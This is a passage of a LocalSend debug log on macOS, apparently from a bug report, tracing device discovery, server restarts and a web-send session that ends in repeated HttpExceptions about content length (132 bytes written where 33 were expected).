01:54:21.121791 [INFO] [Refena] Action dispatched: [HomePage] -&gt; [PurchaseService.InitPurchaseStream] flutter: 2024-09-11 01:54:21.140237 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:21.161205 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:21.164050 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.164115 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(LocalIpService)] flutter: 2024-09-11 01:54:21.164139 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:21.164153 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:21.164165 [INFO] [Refena] - Rebuild (1): [ReceiveTab] flutter: 2024-09-11 01:54:21.164176 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.164515 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:21.384270 [INFO] [Refena] Connecting to Refena Inspector at [localhost]:9253 (inferred by platformHint = macOS) flutter: 2024-09-11 01:54:21.408090 [INFO] [Refena] Failed to connect to Refena Inspector. flutter: 2024-09-11 01:54:22.940225 [INFO] [Refena] Action dispatched: [HomePageController] -&gt; [HomePageController.ChangeTabAction] flutter: 2024-09-11 01:54:22.943297 [INFO] [Refena]  flutter: 2024-09-11 01:54:22.943355 [INFO] [Refena] Change by [HomePageController] triggered by [ChangeTabAction] flutter: 2024-09-11 01:54:22.943407 [INFO] [Refena] - Prev: Instance of 'HomePageVm' flutter: 2024-09-11 01:54:22.943432 [INFO] [Refena] - Next: Instance of 'HomePageVm' flutter: 2024-09-11 01:54:22.943475 [INFO] [Refena] - Rebuild (2): [HomePage], [Consumer] flutter: 2024-09-11 01:54:22.943491 [INFO] [Refena]  flutter: 2024-09-11 01:54:22.943560 [INFO] [Refena] Action finished: [HomePageController.ChangeTabAction] flutter: 2024-09-11 01:54:22.957904 [INFO] [Refena]  flutter: 2024-09-11 01:54:22.957970 [INFO] [Refena] Provider initialized: [SelectedSendingFilesNotifier] flutter: 2024-09-11 01:54:22.957986 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:22.958023 [INFO] [Refena] - Value: [] flutter: 2024-09-11 01:54:22.958040 [INFO] [Refena]  flutter: 2024-09-11 01:54:22.958533 [INFO] [Refena]  flutter: 2024-09-11 01:54:22.958551 [INFO] [Refena] Provider initialized: [ViewProvider&lt;SendTabVm&gt;] flutter: 2024-09-11 01:54:22.958563 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:22.958582 [INFO] [Refena] - Value: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:22.958594 [INFO] [Refena]  flutter: 2024-09-11 01:54:23.022852 [INFO] [Refena]  flutter: 2024-09-11 01:54:23.022926 [INFO] [Refena] Provider initialized: [GlobalRedux] flutter: 2024-09-11 01:54:23.022939 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:23.022960 [INFO] [Refena] - Value: null flutter: 2024-09-11 01:54:23.022969 [INFO] [Refena]  flutter: 2024-09-11 01:54:23.023244 [INFO] [Refena] Action dispatched: [ViewModelBuilder&lt;SendTabVm&gt;] -&gt; [SendTabInitAction] (global) flutter: 2024-09-11 01:54:23.024001 [INFO] [Refena] Action dispatched: [SendTabInitAction] -&gt; [StartSmartScan] (global) flutter: 2024-09-11 01:54:23.024422 [INFO] [Refena] Action dispatched: [StartSmartScan] -&gt; [NearbyDevicesService.StartMulticastScan] (external) flutter: 2024-09-11 01:54:23.024640 [INFO] [Refena] Action dispatched: [NearbyDevicesService.StartMulticastScan] -&gt; [IsolateController.IsolateSendMulticastAnnouncementAction] (external) flutter: 2024-09-11 01:54:23.024912 [INFO] [Refena] Action finished: [IsolateController.IsolateSendMulticastAnnouncementAction] flutter: 2024-09-11 01:54:23.025383 [INFO] [Refena] Action finished: [NearbyDevicesService.StartMulticastScan] flutter: 2024-09-11 01:54:23.025814 [INFO] [Refena] Action dispatched: [StartSmartScan] -&gt; [NearbyDevicesService.StartFavoriteScan] (external) flutter: 2024-09-11 01:54:23.027406 [INFO] [Refena] Action finished: [NearbyDevicesService.StartFavoriteScan] flutter: 2024-09-11 01:54:23.128642 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:23.142222 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:23.640697 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:24.029823 [INFO] [Refena] Action dispatched: [StartSmartScan] -&gt; [StartLegacySubnetScan] (global) flutter: 2024-09-11 01:54:24.030635 [INFO] [Refena] Action dispatched: [StartLegacySubnetScan] -&gt; [NearbyDevicesService.StartMulticastScan] (external) flutter: 2024-09-11 01:54:24.030710 [INFO] [Refena] Action dispatched: [NearbyDevicesService.StartMulticastScan] -&gt; [IsolateController.IsolateSendMulticastAnnouncementAction] (external) flutter: 2024-09-11 01:54:24.031101 [INFO] [Refena] Action finished: [IsolateController.IsolateSendMulticastAnnouncementAction] flutter: 2024-09-11 01:54:24.031192 [INFO] [Refena] Action finished: [NearbyDevicesService.StartMulticastScan] flutter: 2024-09-11 01:54:24.031367 [INFO] [Refena] Action dispatched: [StartLegacySubnetScan] -&gt; [NearbyDevicesService.StartLegacyScan] (external) flutter: 2024-09-11 01:54:24.032292 [INFO] [Refena] Action dispatched: [NearbyDevicesService.StartLegacyScan] -&gt; [NearbyDevicesService._SetRunningIpsAction] flutter: 2024-09-11 01:54:24.034691 [INFO] [Refena]  flutter: 2024-09-11 01:54:24.034760 [INFO] [Refena] Change by [NearbyDevicesService] triggered by [_SetRunningIpsAction] flutter: 2024-09-11 01:54:24.035024 [INFO] [Refena] - Prev: NearbyDevicesState(runningFavoriteScan: false, runningIps: {}, devices: {}) flutter: 2024-09-11 01:54:24.035533 [INFO] [Refena] - Next: NearbyDevicesState(runningFavoriteScan: false, runningIps: {192.168.33.12}, devices: {}) flutter: 2024-09-11 01:54:24.035557 [INFO] [Refena] - Rebuild (2): [ViewProvider&lt;SendTabVm&gt;], [_ScanButton] flutter: 2024-09-11 01:54:24.035569 [INFO] [Refena]  flutter: 2024-09-11 01:54:24.035626 [INFO] [Refena] Action finished: [NearbyDevicesService._SetRunningIpsAction] flutter: 2024-09-11 01:54:24.036228 [INFO] [Refena] Action dispatched: [NearbyDevicesService.StartLegacyScan] -&gt; [IsolateController.IsolateInterfaceHttpDiscoveryAction] (external) flutter: 2024-09-11 01:54:24.037328 [INFO] [Refena] Action finished: [IsolateController.IsolateInterfaceHttpDiscoveryAction] with result: [Instance of '_ControllerStream&lt;Device&gt;'] flutter: 2024-09-11 01:54:24.038342 [INFO] [Refena]  flutter: 2024-09-11 01:54:24.038629 [INFO] [Refena] Rebuild by [ViewProvider&lt;SendTabVm&gt;] triggered by [ChangeEvent(NearbyDevicesService)] flutter: 2024-09-11 01:54:24.038689 [INFO] [Refena] - Prev: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:24.038704 [INFO] [Refena] - Next: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:24.038759 [INFO] [Refena] - Rebuild (1): [ViewModelBuilder&lt;SendTabVm&gt;] flutter: 2024-09-11 01:54:24.038771 [INFO] [Refena]  flutter: 2024-09-11 01:54:24.134835 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:24.637138 [INFO] [Multicast] Announce via UDP BOOL _NSPersistentUIDeleteItemAtFileURL(NSURL *const __strong) Failed to stat item: file:Users/shlomo/Library/Containers/org.localsend.localsendApp/Data/Library/Saved%20Application%20State/org.localsend.localsendApp.savedState/restorecount.plist flutter: 2024-09-11 01:54:25.643453 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:26.638451 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:27.092653 [INFO] [Refena] Action dispatched: [LocalSendApp] -&gt; [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:27.094151 [INFO] [Refena] Action finished: [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:27.096555 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:27.097687 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:27.098138 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:27.125325 [INFO] [Refena]  flutter: 2024-09-11 01:54:27.125407 [INFO] [Refena] Change by [NearbyDevicesService] triggered by [StartLegacyScan] flutter: 2024-09-11 01:54:27.125495 [INFO] [Refena] - Prev: NearbyDevicesState(runningFavoriteScan: false, runningIps: {192.168.33.12}, devices: {}) flutter: 2024-09-11 01:54:27.125537 [INFO] [Refena] - Next: NearbyDevicesState(runningFavoriteScan: false, runningIps: {}, devices: {}) flutter: 2024-09-11 01:54:27.125559 [INFO] [Refena] - Rebuild (2): [ViewProvider&lt;SendTabVm&gt;], [_ScanButton] flutter: 2024-09-11 01:54:27.125574 [INFO] [Refena]  flutter: 2024-09-11 01:54:27.125641 [INFO] [Refena] Action finished: [NearbyDevicesService.StartLegacyScan] flutter: 2024-09-11 01:54:27.126921 [INFO] [Refena] Action finished: [StartLegacySubnetScan] flutter: 2024-09-11 01:54:27.128774 [INFO] [Refena] Action finished: [StartSmartScan] flutter: 2024-09-11 01:54:27.128865 [INFO] [Refena] Action finished: [SendTabInitAction] flutter: 2024-09-11 01:54:27.129402 [INFO] [Refena]  flutter: 2024-09-11 01:54:27.129487 [INFO] [Refena] Rebuild by [ViewProvider&lt;SendTabVm&gt;] triggered by [ChangeEvent(NearbyDevicesService)] flutter: 2024-09-11 01:54:27.129531 [INFO] [Refena] - Prev: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:27.129558 [INFO] [Refena] - Next: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:27.129582 [INFO] [Refena] - Rebuild (1): [ViewModelBuilder&lt;SendTabVm&gt;] flutter: 2024-09-11 01:54:27.129601 [INFO] [Refena]  flutter: 2024-09-11 01:54:30.865262 [INFO] [Refena] Action dispatched: [LocalSendApp] -&gt; [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:30.865819 [INFO] [Refena] Action finished: [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:30.869343 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:30.869610 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:30.873783 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:32.760321 [INFO] [Refena] Action dispatched: [ViewModelBuilder&lt;SendTabVm&gt;] -&gt; [PickFileAction] (global) flutter: 2024-09-11 01:54:32.771998 [INFO] [Refena] Action dispatched: [PickFileAction] -&gt; [SelectedSendingFilesNotifier.AddMessageAction] (external) flutter: 2024-09-11 01:54:32.777433 [INFO] [Refena]  flutter: 2024-09-11 01:54:32.777517 [INFO] [Refena] Change by [SelectedSendingFilesNotifier] triggered by [AddMessageAction] flutter: 2024-09-11 01:54:32.777582 [INFO] [Refena] - Prev: [] flutter: 2024-09-11 01:54:32.778009 [INFO] [Refena] - Next: [CrossFile(name: ad0b376a-e624-4161-813d-355057471293.txt, fileType: FileType.text, size: 33, thumbnail: null, asset: null, path: null, bytes: 33)] flutter: 2024-09-11 01:54:32.778069 [INFO] [Refena] - Rebuild (1): [ViewProvider&lt;SendTabVm&gt;] flutter: 2024-09-11 01:54:32.778091 [INFO] [Refena]  flutter: 2024-09-11 01:54:32.778169 [INFO] [Refena] Action finished: [SelectedSendingFilesNotifier.AddMessageAction] flutter: 2024-09-11 01:54:32.778214 [INFO] [Refena] Action finished: [PickFileAction] flutter: 2024-09-11 01:54:32.778466 [INFO] [Refena]  flutter: 2024-09-11 01:54:32.778502 [INFO] [Refena] Rebuild by [ViewProvider&lt;SendTabVm&gt;] triggered by [ChangeEvent(SelectedSendingFilesNotifier)] flutter: 2024-09-11 01:54:32.778525 [INFO] [Refena] - Prev: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:32.778541 [INFO] [Refena] - Next: Instance of 'SendTabVm' flutter: 2024-09-11 01:54:32.778562 [INFO] [Refena] - Rebuild (1): [ViewModelBuilder&lt;SendTabVm&gt;] flutter: 2024-09-11 01:54:32.778574 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.849518 [INFO] [Server] Stopping server flutter: 2024-09-11 01:54:36.851574 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.851623 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:36.852267 [INFO] [Refena] - Prev: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: true, session: null, webSendState: null, pinAttempts: {}) flutter: 2024-09-11 01:54:36.852293 [INFO] [Refena] - Next: null flutter: 2024-09-11 01:54:36.852313 [INFO] [Refena] - Rebuild (1): [ViewProvider&lt;ReceiveTabVm&gt;] flutter: 2024-09-11 01:54:36.852326 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.852972 [INFO] [Refena] Action dispatched: [ChangeEvent(ServerService)] -&gt; [IsolateController.IsolateSyncServerStateAction] flutter: 2024-09-11 01:54:36.854807 [INFO] [Refena] Action dispatched: [IsolateController.IsolateSyncServerStateAction] -&gt; [IsolateController._PublishSyncStateAction] flutter: 2024-09-11 01:54:36.860261 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.860544 [INFO] [Refena] Change by [IsolateController] triggered by [_PublishSyncStateAction] flutter: 2024-09-11 01:54:36.861035 [INFO] [Refena] - Prev: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.https, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: false), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:36.861100 [INFO] [Refena] - Next: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.https, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: false, download: false), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:36.861119 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:36.861133 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.861300 [INFO] [Refena] Action finished: [IsolateController._PublishSyncStateAction] flutter: 2024-09-11 01:54:36.861388 [INFO] [Refena] Action finished: [IsolateController.IsolateSyncServerStateAction] flutter: 2024-09-11 01:54:36.861474 [INFO] [Server] Server stopped. flutter: 2024-09-11 01:54:36.861678 [INFO] [Server] Starting server flutter: 2024-09-11 01:54:36.864568 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.864639 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(ServerService)] flutter: 2024-09-11 01:54:36.864724 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:36.864742 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:36.864754 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:36.864765 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.867181 [INFO] [Server] Server started. (Port: 53317, HTTP only) flutter: 2024-09-11 01:54:36.867842 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.867901 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:36.867927 [INFO] [Refena] - Prev: null flutter: 2024-09-11 01:54:36.868047 [INFO] [Refena] - Next: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: null, pinAttempts: {}) flutter: 2024-09-11 01:54:36.868066 [INFO] [Refena] - Rebuild (1): [ViewProvider&lt;ReceiveTabVm&gt;] flutter: 2024-09-11 01:54:36.868076 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.868144 [INFO] [Refena] Action dispatched: [ChangeEvent(ServerService)] -&gt; [IsolateController.IsolateSyncServerStateAction] flutter: 2024-09-11 01:54:36.868194 [INFO] [Refena] Action dispatched: [IsolateController.IsolateSyncServerStateAction] -&gt; [IsolateController._PublishSyncStateAction] flutter: 2024-09-11 01:54:36.868431 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.868452 [INFO] [Refena] Change by [IsolateController] triggered by [_PublishSyncStateAction] flutter: 2024-09-11 01:54:36.868475 [INFO] [Refena] - Prev: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.https, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: false, download: false), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:36.868496 [INFO] [Refena] - Next: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.http, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: false), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:36.868758 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:36.868772 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.868799 [INFO] [Refena] Action finished: [IsolateController._PublishSyncStateAction] flutter: 2024-09-11 01:54:36.868819 [INFO] [Refena] Action finished: [IsolateController.IsolateSyncServerStateAction] flutter: 2024-09-11 01:54:36.871241 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.871273 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:36.871334 [INFO] [Refena] - Prev: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: null, pinAttempts: {}) flutter: 2024-09-11 01:54:36.873802 [INFO] [Refena] - Next: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: false, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:36.873844 [INFO] [Refena] - Rebuild (1): [ViewProvider&lt;ReceiveTabVm&gt;] flutter: 2024-09-11 01:54:36.873856 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.873922 [INFO] [Refena] Action dispatched: [ChangeEvent(ServerService)] -&gt; [IsolateController.IsolateSyncServerStateAction] flutter: 2024-09-11 01:54:36.873965 [INFO] [Refena] Action dispatched: [IsolateController.IsolateSyncServerStateAction] -&gt; [IsolateController._PublishSyncStateAction] flutter: 2024-09-11 01:54:36.874439 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.874476 [INFO] [Refena] Change by [IsolateController] triggered by [_PublishSyncStateAction] flutter: 2024-09-11 01:54:36.874508 [INFO] [Refena] - Prev: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.http, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: false), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:36.874530 [INFO] [Refena] - Next: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.http, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: true), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:36.874582 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:36.874599 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.874638 [INFO] [Refena] Action finished: [IsolateController._PublishSyncStateAction] flutter: 2024-09-11 01:54:36.874664 [INFO] [Refena] Action finished: [IsolateController.IsolateSyncServerStateAction] flutter: 2024-09-11 01:54:36.875732 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.875759 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(ServerService)] flutter: 2024-09-11 01:54:36.875776 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:36.875792 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:36.875801 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:36.875810 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.875887 [INFO] [Refena]  flutter: 2024-09-11 01:54:36.876697 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(ServerService)] flutter: 2024-09-11 01:54:36.876711 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:36.876722 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:36.876731 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:36.876739 [INFO] [Refena]  flutter: 2024-09-11 01:54:39.866299 [INFO] [Refena]  flutter: 2024-09-11 01:54:39.866391 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:39.866655 [INFO] [Refena] - Prev: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: false, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:39.866784 [INFO] [Refena] - Next: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: true, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:39.866807 [INFO] [Refena] - Rebuild (2): [ViewProvider&lt;ReceiveTabVm&gt;], [Builder] flutter: 2024-09-11 01:54:39.866823 [INFO] [Refena]  flutter: 2024-09-11 01:54:39.867149 [INFO] [Refena]  flutter: 2024-09-11 01:54:39.867324 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(ServerService)] flutter: 2024-09-11 01:54:39.867412 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:39.867448 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:39.867461 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:39.867473 [INFO] [Refena]  flutter: 2024-09-11 01:54:42.267932 [INFO] [Refena]  flutter: 2024-09-11 01:54:42.267994 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:42.268166 [INFO] [Refena] - Prev: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: true, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:42.269064 [INFO] [Refena] - Next: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {192.168.33.12: WebSendSession(sessionId: 192.168.33.12, responseHandler: Instance of '_AsyncStreamController&lt;bool&gt;', ip: 192.168.33.12, deviceInfo: Chrome (macOS))}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: true, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:42.269092 [INFO] [Refena] - Rebuild (2): [ViewProvider&lt;ReceiveTabVm&gt;], [Builder] flutter: 2024-09-11 01:54:42.269105 [INFO] [Refena]  flutter: 2024-09-11 01:54:42.271086 [INFO] [Refena]  flutter: 2024-09-11 01:54:42.271117 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:42.271347 [INFO] [Refena] - Prev: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {192.168.33.12: WebSendSession(sessionId: 192.168.33.12, responseHandler: Instance of '_AsyncStreamController&lt;bool&gt;', ip: 192.168.33.12, deviceInfo: Chrome (macOS))}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: true, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:42.271417 [INFO] [Refena] - Next: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: false, session: null, webSendState: WebSendState(sessions: {192.168.33.12: WebSendSession(sessionId: 192.168.33.12, responseHandler: null, ip: 192.168.33.12, deviceInfo: Chrome (macOS))}, files: {283d7717-27bf-48d4-890b-2be050cfbb35: WebSendFile(file: Instance of 'FileDto', asset: null, path: null, bytes: (82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69))}, autoAccept: true, pin: null, pinAttempts: {}), pinAttempts: {}) flutter: 2024-09-11 01:54:42.271430 [INFO] [Refena] - Rebuild (2): [ViewProvider&lt;ReceiveTabVm&gt;], [Builder] flutter: 2024-09-11 01:54:42.271438 [INFO] [Refena]  flutter: 2024-09-11 01:54:42.278951 [INFO] [Refena]  flutter: 2024-09-11 01:54:42.279125 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(ServerService), ChangeEvent(ServerService)] flutter: 2024-09-11 01:54:42.279185 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:42.279199 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:42.279209 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:42.279217 [INFO] [Refena]  [ERROR:flutter/runtime/dart_vm_initializer.cc(41)] Unhandled Exception: HttpException: Content size exceeds specified contentLength. 132 bytes written while expected 33. [[82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69]] [ERROR:flutter/runtime/dart_vm_initializer.cc(41)] Unhandled Exception: HttpException: Content size exceeds specified contentLength. 132 bytes written while expected 33. [[82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69]] flutter: 2024-09-11 01:54:44.950004 [INFO] [Refena] Action dispatched: [LocalSendApp] -&gt; [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:44.950293 [INFO] [Refena] Action finished: [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:44.953157 [INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:44.953602 